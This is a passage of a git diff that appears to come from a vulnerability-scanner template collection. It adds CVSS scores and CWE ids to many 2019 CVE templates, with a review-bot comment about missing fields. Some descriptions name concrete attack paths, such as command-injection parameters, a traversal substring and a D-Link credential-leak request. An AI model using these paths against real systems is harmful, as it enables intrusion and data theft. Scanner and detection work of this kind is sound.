@@ -9,6 +9,11 @@ info: - https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/CVE-2019-16313%20%E8%9C%82%E7%BD%91%E4%BA%92%E8%81%94%E4%BC%81%E4%B8%9A%E7%BA%A7%E8%B7%AF%E7%94%B1%E5%99%A8v4.31%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md - https://nvd.nist.gov/vuln/detail/CVE-2019-16313 tags: cve,cve2019,exposure,router,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-16313 + cwe-id: CWE-798 requests: - method: GET diff --git a/cves/2019/CVE-2019-16332.yaml b/cves/2019/CVE-2019-16332.yaml index 4f4f37861c..988cb5d0d9 100644 --- a/cves/2019/CVE-2019-16332.yaml +++ b/cves/2019/CVE-2019-16332.yaml @@ -9,6 +9,11 @@ info: - https://plugins.trac.wordpress.org/changeset/2152730 - https://wordpress.org/plugins/api-bearer-auth/#developers tags: cve,cve2019,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-16332 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-16525.yaml b/cves/2019/CVE-2019-16525.yaml index c2ccc90357..c0b2649797 100644 --- a/cves/2019/CVE-2019-16525.yaml +++ b/cves/2019/CVE-2019-16525.yaml @@ -7,6 +7,11 @@ info: description: An XSS issue was discovered in the checklist plugin before 1.1.9 for WordPress. The fill parameter is not correctly filtered in the checklist-icon.php file, and it is possible to inject JavaScript code. reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16525 tags: cve,cve2019,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-16525 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-1653.yaml b/cves/2019/CVE-2019-1653.yaml index 34e5db456d..3428aaef8e 100644 --- a/cves/2019/CVE-2019-1653.yaml +++ b/cves/2019/CVE-2019-1653.yaml 
@@ -10,6 +10,11 @@ info: - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info - https://www.exploit-db.com/exploits/46262/ - https://www.exploit-db.com/exploits/46655/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-1653 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2019/CVE-2019-16662.yaml b/cves/2019/CVE-2019-16662.yaml index 592bff2265..7ab910ea7e 100644 --- a/cves/2019/CVE-2019-16662.yaml +++ b/cves/2019/CVE-2019-16662.yaml @@ -6,6 +6,12 @@ info: severity: critical reference: https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/ tags: cve,cve2019,rce,intrusive + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-16662 + cwe-id: CWE-78 + description: "An issue was discovered in rConfig 3.9.2. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution." requests: - method: GET diff --git a/cves/2019/CVE-2019-16759.yaml b/cves/2019/CVE-2019-16759.yaml index 7c3e049ff8..7917672a21 100644 --- a/cves/2019/CVE-2019-16759.yaml +++ b/cves/2019/CVE-2019-16759.yaml @@ -3,9 +3,15 @@ id: CVE-2019-16759 info: name: 0day RCE in vBulletin v5.0.0-v5.5.4 fix bypass author: madrobot - severity: high + severity: critical reference: https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/ tags: cve,cve2019,vbulletin,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-16759 + cwe-id: CWE-94 + description: "vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request." requests: - raw: 
diff --git a/cves/2019/CVE-2019-16920.yaml b/cves/2019/CVE-2019-16920.yaml index 2ac46ac67b..c45dc73829 100644 --- a/cves/2019/CVE-2019-16920.yaml +++ b/cves/2019/CVE-2019-16920.yaml @@ -7,6 +7,11 @@ info: description: Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825. reference: https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r tags: cve,cve2019,dlink,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-16920 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2019/CVE-2019-17270.yaml b/cves/2019/CVE-2019-17270.yaml index 3b9928363a..35d7049dea 100644 --- a/cves/2019/CVE-2019-17270.yaml +++ b/cves/2019/CVE-2019-17270.yaml 
@@ -3,13 +3,18 @@ id: CVE-2019-17270 info: name: Yachtcontrol Webapplication 1.0 - Unauthenticated Rce author: pikpikcu - severity: high + severity: critical reference: - https://www.exploit-db.com/exploits/47760 - https://nvd.nist.gov/vuln/detail/CVE-2019-17270 description: | A vulnerability in Yachtcontrol makes it possible to perform direct Operating System commands as an unauthenticated user via the "/pages/systemcall.php?command={COMMAND}" page and parameter, where {COMMAND} will be executed and returning the results to the client. Affects Yachtcontrol webservers disclosed via Dutch GPRS/4G mobile IP-ranges. IP addresses vary due to DHCP client leasing of telco's. tags: rce,yachtcontrol,cve,cve2019 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-17270 + cwe-id: CWE-78 requests: - method: GET diff --git a/cves/2019/CVE-2019-17382.yaml b/cves/2019/CVE-2019-17382.yaml index d25a72cee2..163e4ead10 100644 --- a/cves/2019/CVE-2019-17382.yaml +++ b/cves/2019/CVE-2019-17382.yaml @@ -7,6 +7,11 @@ info: description: An issue was discovered in zabbix.php?action=dashboard.view&dashboardid=1 in Zabbix through 4.4. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin. reference: https://www.exploit-db.com/exploits/47467 tags: cve,cve2019,zabbix,fuzz + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.10 + cve-id: CVE-2019-17382 + cwe-id: CWE-639 requests: - raw: diff --git a/cves/2019/CVE-2019-17503.yaml b/cves/2019/CVE-2019-17503.yaml index beca789136..a3b8e66c08 100644 --- a/cves/2019/CVE-2019-17503.yaml +++ b/cves/2019/CVE-2019-17503.yaml 
@@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/47498 - https://nvd.nist.gov/vuln/detail/CVE-2019-17503 tags: cve,cve2019,exposure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2019-17503 + cwe-id: CWE-425 requests: - method: GET diff --git a/cves/2019/CVE-2019-17506.yaml b/cves/2019/CVE-2019-17506.yaml index 3a6a05e8f2..0dbb3edcee 100644 --- a/cves/2019/CVE-2019-17506.yaml +++ b/cves/2019/CVE-2019-17506.yaml @@ -7,6 +7,11 @@ info: description: There are some web interfaces without authentication requirements on D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers. An attacker can get the router's username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely. reference: https://github.com/dahua966/Routers-vuls/blob/master/DIR-868/name%26passwd.py tags: cve,cve2019,dlink + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-17506 + cwe-id: CWE-306 requests: - method: POST diff --git a/cves/2019/CVE-2019-17538.yaml b/cves/2019/CVE-2019-17538.yaml index 4051eaaa7e..a1a7023154 100644 --- a/cves/2019/CVE-2019-17538.yaml +++ b/cves/2019/CVE-2019-17538.yaml @@ -6,6 +6,12 @@ info: reference: https://github.com/shi-yang/jnoj/issues/53 tags: cve,cve2019,jnoj,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-17538 + cwe-id: CWE-22 + description: "Jiangnan Online Judge (aka jnoj) 0.8.0 has Directory Traversal for file reading via the web/polygon/problem/viewfile?id=1&name=../ substring." requests: - raw: - | diff --git a/cves/2019/CVE-2019-17558.yaml b/cves/2019/CVE-2019-17558.yaml index b7c1855604..dc6c7b9786 100644 --- a/cves/2019/CVE-2019-17558.yaml +++ b/cves/2019/CVE-2019-17558.yaml 
@@ -2,9 +2,15 @@ id: CVE-2019-17558 info: name: Apache Solr 8.3.0 - Remote Code Execution via Velocity Template author: pikpikcu,madrobot - severity: critical + severity: high reference: https://nvd.nist.gov/vuln/detail/CVE-2019-17558 tags: cve,cve2019,apache,rce,solr,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.50 + cve-id: CVE-2019-17558 + cwe-id: CWE-74 + description: "Apache Solr 5.0.0 to Apache Solr 8.3.1 are vulnerable to a Remote Code Execution through the VelocityResponseWriter. A Velocity template can be provided through Velocity templates in a configset `velocity/` directory or as a parameter. A user defined configset could contain renderable, potentially malicious, templates. Parameter provided templates are disabled by default, but can be enabled by setting `params.resource.loader.enabled` by defining a response writer with that setting set to `true`. Defining a response writer requires configuration API access. Solr 8.4 removed the params resource loader entirely, and only enables the configset-provided template rendering when the configset is `trusted` (has been uploaded by an authenticated user)." requests: - raw: diff --git a/cves/2019/CVE-2019-18393.yaml b/cves/2019/CVE-2019-18393.yaml index 6f9a81ac5d..ca54457a31 100644 --- a/cves/2019/CVE-2019-18393.yaml +++ b/cves/2019/CVE-2019-18393.yaml @@ -2,10 +2,15 @@ id: CVE-2019-18393 info: name: Openfire LFI author: pikpikcu - severity: high + severity: medium description: PluginServlet.java in Ignite Realtime Openfire through 4.4.2 does not ensure that retrieved files are located under the Openfire home directory, aka a directory traversal vulnerability. reference: https://swarm.ptsecurity.com/openfire-admin-console/ tags: cve,cve2019,openfire,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2019-18393 + cwe-id: CWE-22 requests: - method: GET 
diff --git a/cves/2019/CVE-2019-18394.yaml b/cves/2019/CVE-2019-18394.yaml index 389cc72ec4..3c50ca751a 100644 --- a/cves/2019/CVE-2019-18394.yaml +++ b/cves/2019/CVE-2019-18394.yaml @@ -9,6 +9,11 @@ info: - https://swarm.ptsecurity.com/openfire-admin-console/ - https://github.com/igniterealtime/Openfire/pull/1497 tags: cve,cve2019,ssrf,openfire,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-18394 + cwe-id: CWE-918 requests: - method: GET diff --git a/cves/2019/CVE-2019-18818.yaml b/cves/2019/CVE-2019-18818.yaml index bd28bef61f..01d00b9999 100644 --- a/cves/2019/CVE-2019-18818.yaml +++ b/cves/2019/CVE-2019-18818.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2019-18818 severity: critical tags: cve,cve2019,strapi,auth-bypass,intrusive + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-18818 + cwe-id: CWE-640 requests: - raw: diff --git a/cves/2019/CVE-2019-19134.yaml b/cves/2019/CVE-2019-19134.yaml index 89c923f6b0..5a3e696f04 100644 --- a/cves/2019/CVE-2019-19134.yaml +++ b/cves/2019/CVE-2019-19134.yaml @@ -7,6 +7,11 @@ info: description: The Hero Maps Premium plugin 2.2.1 and prior for WordPress is prone to unauthenticated XSS via the views/dashboard/index.php p parameter because it fails to sufficiently sanitize user-supplied input - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 reference: https://wpscan.com/vulnerability/d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01 tags: cve,cve2019,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-19134 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-19368.yaml b/cves/2019/CVE-2019-19368.yaml index a0715365dc..0105b0b817 100644 --- a/cves/2019/CVE-2019-19368.yaml +++ b/cves/2019/CVE-2019-19368.yaml 
@@ -7,6 +7,11 @@ info: description: A Reflected Cross Site Scripting was discovered in the Login page of Rumpus FTP Web File Manager 8.2.9.1. An attacker can exploit it by sending a crafted link to end users and can execute arbitrary Javascripts reference: https://github.com/harshit-shukla/CVE-2019-19368/ tags: cve,cve2019,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-19368 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-19781.yaml b/cves/2019/CVE-2019-19781.yaml index 9557399b76..318fc4fb2c 100644 --- a/cves/2019/CVE-2019-19781.yaml +++ b/cves/2019/CVE-2019-19781.yaml @@ -3,10 +3,15 @@ id: CVE-2019-19781 info: name: Citrix ADC Directory Traversal author: organiccrap - severity: high + severity: critical description: An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal. reference: https://support.citrix.com/article/CTX267027 tags: cve,cve2019,citrix,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-19781 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-19908.yaml b/cves/2019/CVE-2019-19908.yaml index 3be30f419e..8f9a04ea11 100644 --- a/cves/2019/CVE-2019-19908.yaml +++ b/cves/2019/CVE-2019-19908.yaml @@ -7,6 +7,11 @@ info: description: phpMyChat-Plus 1.98 is vulnerable to reflected XSS via JavaScript injection into the password reset URL. In the URL, the pmc_username parameter to pass_reset.php is vulnerable. reference: https://cinzinga.github.io/CVE-2019-19908/ tags: cve,cve2019,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-19908 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-19985.yaml b/cves/2019/CVE-2019-19985.yaml index 6d1138f5ce..da9611d488 100644 
--- a/cves/2019/CVE-2019-19985.yaml +++ b/cves/2019/CVE-2019-19985.yaml @@ -7,6 +7,11 @@ info: description: The WordPress plugin, Email Subscribers & Newsletters, before 4.2.3 had a flaw that allowed unauthenticated file download with user information disclosure. reference: https://www.exploit-db.com/exploits/48698 tags: cve,cve2019,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2019-19985 + cwe-id: CWE-862 requests: - method: GET diff --git a/cves/2019/CVE-2019-20085.yaml b/cves/2019/CVE-2019-20085.yaml index 58a3857874..605d0be619 100644 --- a/cves/2019/CVE-2019-20085.yaml +++ b/cves/2019/CVE-2019-20085.yaml @@ -9,6 +9,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2019-20085 - https://www.exploit-db.com/exploits/48311 tags: cve,cve2019,iot,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-20085 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-20141.yaml b/cves/2019/CVE-2019-20141.yaml index e94d8eb197..43d20edb98 100644 --- a/cves/2019/CVE-2019-20141.yaml +++ b/cves/2019/CVE-2019-20141.yaml @@ -7,6 +7,11 @@ info: description: An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter. reference: https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html tags: cve,cve2019,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-20141 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-2588.yaml b/cves/2019/CVE-2019-2588.yaml index cdc771e4c6..92c2d58019 100644 --- a/cves/2019/CVE-2019-2588.yaml +++ b/cves/2019/CVE-2019-2588.yaml 
@@ -3,11 +3,15 @@ id: CVE-2019-2588
 info:
   name: Oracle Business Intelligence Path Traversal
   author: madrobot
-  severity: high
+  severity: medium
   tags: cve,cve2019,oracle,lfi
   reference: http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
   description: |
     Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware (subcomponent: BI Publisher Security)
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 4.90
+    cve-id: CVE-2019-2588
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-2616.yaml b/cves/2019/CVE-2019-2616.yaml
index 1d87fb5936..e8c42482e2 100644
--- a/cves/2019/CVE-2019-2616.yaml
+++ b/cves/2019/CVE-2019-2616.yaml
@@ -9,6 +9,10 @@ info:
     - https://nvd.nist.gov/vuln/detail/CVE-2019-2616
     - https://www.exploit-db.com/exploits/46729
   tags: cve,cve2019,oracle,xxe,oob
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.20
+    cve-id: CVE-2019-2616
 
 requests:
   - raw:
diff --git a/cves/2019/CVE-2019-2725.yaml b/cves/2019/CVE-2019-2725.yaml
index 21ee150f0e..7fbac5b4c5 100644
--- a/cves/2019/CVE-2019-2725.yaml
+++ b/cves/2019/CVE-2019-2725.yaml
@@ -11,6 +11,11 @@ info:
     - https://paper.seebug.org/910/
     - https://www.exploit-db.com/exploits/46780/
     - https://www.oracle.com/security-alerts/cpujan2020.html
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2019-2725
+    cwe-id: CWE-74
 
 requests:
   - method: POST
diff --git a/cves/2019/CVE-2019-2767.yaml b/cves/2019/CVE-2019-2767.yaml
index 3478b09508..48d47fda95 100644
--- a/cves/2019/CVE-2019-2767.yaml
+++ b/cves/2019/CVE-2019-2767.yaml
@@ -9,6 +9,10 @@ info:
     - https://nvd.nist.gov/vuln/detail/CVE-2019-2767
     - https://www.exploit-db.com/exploits/46729
   tags: cve,cve2019,oracle,xxe,oob
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.20
+    cve-id: CVE-2019-2767
 
 requests:
   - raw:
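Review bot: The classification block added for CVE-2019-2588 carries no `cwe-id`, while most other hunks in this commit add one; the same omission is in the hunks for CVE-2019-2616 and CVE-2019-2767 on this line and in CVE-2019-5418, CVE-2019-8442, CVE-2019-9733, CVE-2020-11710 and CVE-2020-11853 further down. If the upstream record really lists no CWE for these, a comment on the block such as `# cwe-id: none assigned in the source record` would make the gap deliberate rather than look like a missed field; otherwise the id should be filled in so that filtering templates by CWE behaves consistently across the corpus. The vector here is also `CVSS:3.0` where neighbouring templates use `CVSS:3.1`, which is fine if it mirrors the record but worth a glance at the source. The `requests` section that follows is outside the hunk.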
diff --git a/cves/2019/CVE-2019-3396.yaml b/cves/2019/CVE-2019-3396.yaml
index dd385d5b7f..9a4ba766ef 100644
--- a/cves/2019/CVE-2019-3396.yaml
+++ b/cves/2019/CVE-2019-3396.yaml
@@ -2,10 +2,15 @@ id: CVE-2019-3396
 info:
   author: harshbothra_
   name: Atlassian Confluence Path Traversal
-  severity: high
+  severity: critical
   description: The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
   reference: https://github.com/x-f1v3/CVE-2019-3396
   tags: cve,cve2019,atlassian,confluence,lfi,rce
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2019-3396
+    cwe-id: CWE-22
 
 requests:
   - raw:
diff --git a/cves/2019/CVE-2019-3401.yaml b/cves/2019/CVE-2019-3401.yaml
index 9c2a7c4819..9696be56d8 100644
--- a/cves/2019/CVE-2019-3401.yaml
+++ b/cves/2019/CVE-2019-3401.yaml
@@ -4,9 +4,14 @@ info:
   name: Atlassian JIRA Information Exposure (CVE-2019-3401)
   author: TechbrunchFR,milo2012
   description: The ManageFilters.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check.
-  severity: info
+  severity: medium
   tags: cve,cve2019,jira,atlassian
   reference: https://jira.atlassian.com/browse/JRASERVER-69244
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.30
+    cve-id: CVE-2019-3401
+    cwe-id: CWE-200
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-3402.yaml b/cves/2019/CVE-2019-3402.yaml
index 9ca60822a2..ce14735982 100644
--- a/cves/2019/CVE-2019-3402.yaml
+++ b/cves/2019/CVE-2019-3402.yaml
@@ -7,6 +7,11 @@ info:
   description: The ConfigurePortalPages.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the searchOwnerUserName parameter.
   reference: https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
   tags: cve,cve2019,atlassian,jira,xss
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2019-3402
+    cwe-id: CWE-79
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-3403.yaml b/cves/2019/CVE-2019-3403.yaml
index e554d89a9c..ebf4a42eea 100644
--- a/cves/2019/CVE-2019-3403.yaml
+++ b/cves/2019/CVE-2019-3403.yaml
@@ -7,6 +7,11 @@ info:
   description: The /rest/api/2/user/picker rest resource in Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check.
   reference: https://jira.atlassian.com/browse/JRASERVER-69242
   tags: cve,cve2019,atlassian,jira
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.30
+    cve-id: CVE-2019-3403
+    cwe-id: CWE-863
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-3799.yaml b/cves/2019/CVE-2019-3799.yaml
index 8c8346a9e8..f4c662a765 100644
--- a/cves/2019/CVE-2019-3799.yaml
+++ b/cves/2019/CVE-2019-3799.yaml
@@ -2,12 +2,17 @@ id: CVE-2019-3799
 info:
   name: Spring-Cloud-Config-Server Directory Traversal
   author: madrobot
-  severity: high
+  severity: medium
   description: Spring Cloud Config, versions 2.1.x prior to 2.1.2, versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack.
   reference:
     - https://github.com/mpgn/CVE-2019-3799
     - https://pivotal.io/security/cve-2019-3799
   tags: cve,cve2019,lfi
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
+    cvss-score: 6.50
+    cve-id: CVE-2019-3799
+    cwe-id: CWE-22
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-5127.yaml b/cves/2019/CVE-2019-5127.yaml
index d283867419..07c1505179 100644
--- a/cves/2019/CVE-2019-5127.yaml
+++ b/cves/2019/CVE-2019-5127.yaml
@@ -7,6 +7,11 @@ info:
   description: A command injection vulnerability has been found in YouPHPTube Encoder. A successful attack could allow an attacker to compromise the server. Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3, a plugin for providing encoder functionality in YouPHPTube. The parameter base64Url in /objects/getImage.php is vulnerable to a command injection attack.
   reference: https://talosintelligence.com/vulnerability_reports/TALOS-2019-0917
   tags: cve,cve2019,rce
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2019-5127
+    cwe-id: CWE-78
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-5418.yaml b/cves/2019/CVE-2019-5418.yaml
index b6a5302242..51c1e78b62 100644
--- a/cves/2019/CVE-2019-5418.yaml
+++ b/cves/2019/CVE-2019-5418.yaml
@@ -3,12 +3,16 @@ id: CVE-2019-5418
 info:
   name: File Content Disclosure on Rails
   author: omarkurt
-  severity: medium
+  severity: high
   description: There is a File Content Disclosure vulnerability in Action View <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 where specially crafted accept headers can cause contents of arbitrary files on the target system's file system to be exposed.
   reference:
     - https://github.com/omarkurt/CVE-2019-5418
     - https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/
   tags: cve,cve2019,rails,lfi
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.50
+    cve-id: CVE-2019-5418
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-6112.yaml b/cves/2019/CVE-2019-6112.yaml
index d8c76b9925..5b12bbdb90 100644
--- a/cves/2019/CVE-2019-6112.yaml
+++ b/cves/2019/CVE-2019-6112.yaml
@@ -7,6 +7,11 @@ info:
   description: A Cross-site scripting (XSS) vulnerability in /inc/class-search.php in the Sell Media plugin v2.4.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field).
   reference: https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b
   tags: cve,cve2019,wordpress,wp-plugin,xss
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2019-6112
+    cwe-id: CWE-79
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-6340.yaml b/cves/2019/CVE-2019-6340.yaml
index 515df72aee..d2b3c1a887 100644
--- a/cves/2019/CVE-2019-6340.yaml
+++ b/cves/2019/CVE-2019-6340.yaml
@@ -3,10 +3,15 @@ id: CVE-2019-6340
 info:
   name: Drupal 8 core RESTful Web Services RCE
   author: madrobot
-  severity: critical
+  severity: high
   description: Some field types do not properly sanitize data from non-form sources in Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10. This can lead to arbitrary PHP code execution in some cases.
   reference: https://nvd.nist.gov/vuln/detail/CVE-2019-6340
   tags: cve,cve2019,drupal,rce
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.10
+    cve-id: CVE-2019-6340
+    cwe-id: CWE-502
 
 requests:
   - method: POST
diff --git a/cves/2019/CVE-2019-6715.yaml b/cves/2019/CVE-2019-6715.yaml
index e004b0f931..16bbedcfc0 100644
--- a/cves/2019/CVE-2019-6715.yaml
+++ b/cves/2019/CVE-2019-6715.yaml
@@ -6,6 +6,13 @@ info:
   severity: high
   description: W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated Arbitrary File Read / SSRF
   tags: cve,cve2019,wordpress,wp-plugin,ssrf
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.50
+    cve-id: CVE-2019-6715
+  reference:
